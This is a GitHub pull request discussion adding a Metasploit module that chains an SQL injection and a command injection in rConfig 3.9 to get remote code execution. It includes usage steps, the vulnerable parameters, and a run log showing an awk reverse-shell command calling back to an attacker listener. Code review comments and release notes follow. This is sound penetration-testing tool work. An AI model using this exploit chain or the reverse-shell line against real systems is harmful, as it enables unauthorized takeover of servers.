Add module rConfig 3.9 RCE
rapid7/metasploit-framework pull request #13066
Opened 2020-03-12 11:11 UTC by v1k1ngfr

Add rConfig exploit (chained CVE-2020-10220 + CVE-2019-19509).
```
CVE-2019-19509 :
An issue was discovered in rConfig 3.9.3. A remote authenticated user can directly execute system commands by sending a GET request to ajaxArchiveFiles.php because the path parameter is passed to the exec function without filtering, which can lead to command execution.

CVE-2020-10220 :
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
```
Exploits walkthrough: 
https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py
https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py

### Verification

List the steps needed to make sure this thing works
```
Start msfconsole
use exploit/linux/http/rconfig_ajaxarchivefiles_rce_final
set RHOSTS target_ip
set RPORT target_port
set LHOST your_ip
set LPORT your_port
set verbose true
exploit -j
```

### Scenario
```
resource (rconfig_final.rc)> use exploit/linux/http/rconfig_ajaxarchivefiles_rce_final
resource (rconfig_final.rc)> set RHOSTS 1.1.1.1
resource (rconfig_final.rc)> set RPORT 443
resource (rconfig_final.rc)> set LHOST 1.1.1.2
resource (rconfig_final.rc)> set LPORT 3333
resource (rconfig_final.rc)> set verbose true
resource (rconfig_final.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.2:3333 
msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce_final) > 
[*] STEP 0: Get rConfig version...
[*] rConfig version 3.9 detected
[*] STEP 1 : Adding a temporary admin user...
[+] New temporary user ElCWcNJhUId created
[*] STEP 2: Authenticating as ElCWcNJhUId ...
[+] Authenticated as user ElCWcNJhUId
[*] STEP 3: Executing the command (awk 'BEGIN{s="/inet/tcp/0/1.1.1.2/3333";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}')
[*] Command shell session 1 opened (1.1.1.2:3333 -> 1.1.1.1:39076) at 2020-03-10 15:50:44 +0100
[+] Command sucessfully executed
[*] STEP 4 : Removing the temporary admin user...
[*] User ElCWcNJhUId removed successfully !

msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce_final) > sessions -i 1
[*] Starting interaction with 1...

id
uid=48(apache) gid=48(apache) groups=48(apache)
```

2020-03-12 14:28 UTC, acammack-r7 requested changes
Looks nifty! One to fix is we don't want to use regular expressions to do just a substring test. `String#include?` works better for that.

2020-03-12 14:28 UTC, acammack-r7 commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +    if res.get_html_document.at('div[@id="footer-copyright"]').text =~ /rConfig Version 3\.9/
```suggestion
    if res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig Version 3.9'
```

2020-03-12 14:28 UTC, acammack-r7 commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +    elsif res.get_html_document.at('div[@id="footer-copyright"]').text =~ /rConfig/
```suggestion
    elsif res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig'
```

2020-03-12 14:29 UTC, adfoster-r7 commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +                      'Name'            => 'Rconfig 3.x Chained Remote Code Execution',
Hey - thanks for the PR :+1: There's some formatting issues in this file - would you mind running Rubocop on it? That's our automated code quality tool. You should be able to run it with:

```
rubocop -a modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb 
```

Let me know if you have any issues

2020-03-12 14:45 UTC, tperry-r7 commented
Testing if comments work

2020-03-12 14:55 UTC, v1k1ngfr commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +                      'Name'            => 'Rconfig 3.x Chained Remote Code Execution',
Hi !
I will run it and commit changes.

2020-03-12 14:59 UTC, v1k1ngfr commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +    elsif res.get_html_document.at('div[@id="footer-copyright"]').text =~ /rConfig/
Ok thanks.

2020-03-12 19:46 UTC, touhidshaikh commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +    end
I think here need to add else case ```"Exploit::CheckCode::Safe"```.

2020-03-12 19:53 UTC, touhidshaikh commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +    fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'
if it's not important it should randomize using ```rand_text_alphanumeric(32)```

2020-03-12 20:02 UTC, touhidshaikh commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +      'vars_get' => {
Shuffling this would be great. 
```
      'vars_get' => Hash[{
        'search' => 'search',
        'searchOption' => 'contains',
        'searchField'  => 'vuln',
        'searchColumn' => user_sqli
      }.to_a.shuffle]
```

2020-03-12 20:03 UTC, touhidshaikh commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +      'vars_post' => {
Shuffling here also can be done and every GET and Post request.

2020-03-13 00:24 UTC, adfoster-r7 commented
@v1k1ngfr I've tested this locally and gotten a shell with metasploit 🎉 Would you be okay writing the documentation file?

Full details are [here](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation) and there's a useful [template](https://github.com/rapid7/metasploit-framework/blob/140eef3d0daa447f765f5c291789f0b16766bdfd/documentation/modules/module_doc_template.md) that can be used as the starting point :+1:

2020-03-13 05:33 UTC, v1k1ngfr commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +    end
Hi,
I have no test case were the code is safe. I think it would be better to warn the user that the version (different from 3.9) was not tested but it can also be vulnerable.
rConfig v5 coming Q1 2020 so I think it will be fixed in that new branch.

2020-03-13 05:36 UTC, v1k1ngfr commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +    fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'
I don't know the difference (maybe code improvement) but I will think about it in my next Metasploit modules.

2020-03-13 05:37 UTC, v1k1ngfr commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +      'vars_get' => {
The application will always send parameters in the same position, why shuffling ?

2020-03-13 05:37 UTC, v1k1ngfr commented on modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
> +      'vars_post' => {
The application will always send parameters in the same position, why shuffling ?

2020-03-13 09:14 UTC, v1k1ngfr commented
I created the documentation file, let me know if it's ok for you.

2020-03-14 06:22 UTC, v1k1ngfr commented
> @v1k1ngfr I've tested this locally and gotten a shell with metasploit tada Would you be okay writing the documentation file?
> 
> Full details are [here](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation) and there's a useful [template](https://github.com/rapid7/metasploit-framework/blob/140eef3d0daa447f765f5c291789f0b16766bdfd/documentation/modules/module_doc_template.md) that can be used as the starting point +1

Hi @adfoster-r7 & @acammack-r7, 
Any suggestion about the doc or code ?
Thanks for your help & test !

Have a nice day.

2020-03-16 10:00 UTC, v1k1ngfr commented
Hi,
About the ranking, should I switch from Good to Excellent ?
Regarding the documentation (https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking) :

>  ExcellentRanking | The exploit will never crash the service. This is the case for SQL  Injection, CMD execution, RFI, LFI, etc. No typical memory corruption  exploits should be given this ranking unless there are extraordinary  circumstances (WMF Escape()).

Thanks for your feedback.

2020-03-16 11:20 UTC, merged

2020-03-16 11:21 UTC, adfoster-r7 commented
Thanks for the PR @v1k1ngfr ! I've verified the module working against 3.9 rConfig in a docker container.

2020-03-16 11:26 UTC, adfoster-r7 commented
## Release Notes

Adds a module which exploits multiple vulnerabilities in rConfig version 3.9 and prior in order to execute arbitrary commands. The module first add a temporary admin user to the application by exploiting an SQL injection (CVE-2020-10220). Next, the module authenticates as the newly created user in order to abuse a command injection vulnerability in the `path` parameter of the ajaxArchiveFiles functionality within the rConfig web interface (CVE-2019-19509) to trigger RCE.

2020-03-16 12:55 UTC, v1k1ngfr commented
Oh, great !
Thanks for your help for my first module :-)

Have a nice day.